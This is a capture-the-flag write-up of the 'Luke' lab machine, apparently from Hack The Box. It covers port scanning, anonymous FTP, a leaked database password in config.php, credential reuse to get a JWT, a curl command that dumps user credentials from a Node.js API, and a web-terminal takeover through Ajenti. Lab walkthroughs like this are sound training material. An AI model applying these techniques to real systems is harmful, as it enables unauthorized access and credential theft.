Reconnaisance
As always, I started my attack performing an nmap
scan:
Nmap scan report for 10.10.10.137
Host is up (0.26s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3+ (ext.1)
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 0 0 512 Apr 14 12:35 webapp
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.48
| Logged in as ftp
| TYPE: ASCII
| No session upload bandwidth limit
| No session download bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3+ (ext.1) - secure, fast, stable
|_End of status
22/tcp open ssh?
80/tcp open http Apache httpd 2.4.38 ((FreeBSD) PHP/7.3.3)
| http-methods:
| Supported Methods: POST OPTIONS HEAD GET TRACE
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.38 (FreeBSD) PHP/7.3.3
|_http-title: Luke
3000/tcp open http Node.js Express framework
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
8000/tcp open http Ajenti http control panel
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Ajenti
Enumeration
We saw an open FTP port, so let’s try to connect to it via the ftp
command:
We got a file called for_Chihiro.txt
. Its output is displayed below:
Dear Chihiro !!As you told me that you wanted to learn Web Development and Frontend, I can give you a little push by showing the sources of
the actual website I've created .
Normally you should know where to look but hurry up because I will delete them soon because of our security policies !Derry
Nothing else is interesting on the ftp
server, so let’s try to access the website next:
Yet again, nothing’s interesting on this website, so let’s try to search for hidden pages and directories using gobuster
and dirb
:
We can see that there is a config.php
page available, so let’s access it, its contents are displayed below:
$dbHost = 'localhost'; $dbUsername = 'root'; $dbPassword = 'Zk6heYCyv6ZE9Xcg'; $db = "login"; $conn = new mysqli($dbHost, $dbUsername, $dbPassword,$db) or die("Connect failed: %s\n". $conn -> error);
We now have a set of credentials, let’s set it aside since we can (maybe) use it later.
Looking back at our previous nmap
scan, we can see that there is a Nodejs Express Framework
service on port 3000:
Let’s try to issue a quick curl
command:
Hmm. It seems that we need to supply a JWT auth token to use this endpoint. Let’s try to use the only set of creds that we have for now:
…it didn’t work.
At this point, I formed a hypothesis that this might be another case of credential re-use, so I tried to authenticate using several usernames with the password that we have (Zk6heYCyv6ZE9Xcg
) and got a hit on the username admin
:
Bingo!
Now that we have a useable credential, we can now enumerate the available users in the endpoint:
We have the following user-role pairs:
- Admin — Superuser
- Derry — Web Admin
- Yuri — Beta Tester
- Dory — Supporter
Supplying the command below will enumerate the username-password pairs:
curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4NjEyNTU3LCJleHAiOjE1Njg2OTg5NTd9.9vap7KxTwdnfDiTSdBDl2dzLGTeH8s4rTr47Eus8lZw' http://10.10.10.137:3000/users/<name>
We now have 4 new sets of credentials!
Let’s look for pages where we can use them. Looking back at our previous directory scans, we can see that /management
is available, with the error code 401 (Unauthorized):
Browsing 10.10.10.137/management
confirms this:
Using a bit of inference here, we know that Derry
gave sources to Chihiro
to help show him the ropes w/ regards to Web Development. We also know, based on the listing of the user-role pairs, that Derry
is the Web Admin. So for this authentication prompt, we’ll use Derry’s credentials.
Upon successful authentication, we can see this:
Inspecting config.json
:
Taking note of the highlighted lines, we can see that we have a username-password pair on a service that is bound on port 8000.
Upon authentication, this Ajenti dashboard is displayed:
Interesting, we can see that there is a Terminal
plugin that is listed under Tools
.
Exploitation
Spawning a new web-based Terminal
will now give us access to the user.txt
and root.txt
:
That’s it for this machine’s writeup!
— — — — — — — — — — — — — — — — — — — — — — — — — —
Hi I’m Mon, and I’m one of the founders of hackstreetboys, a CTF team from the Philippines!
While you’re at it, please like our Facebook page (facebook.com/hackstreetboys)
Follow our Twitter account (https://twitter.com/_hackstreetboys)
Read our writeups on Medium (https://medium.com/hackstreetboys)
Look at our new GitHub page (https://github.com/hackstreetboysph)
Check our website (https://hackstreetboys.ph)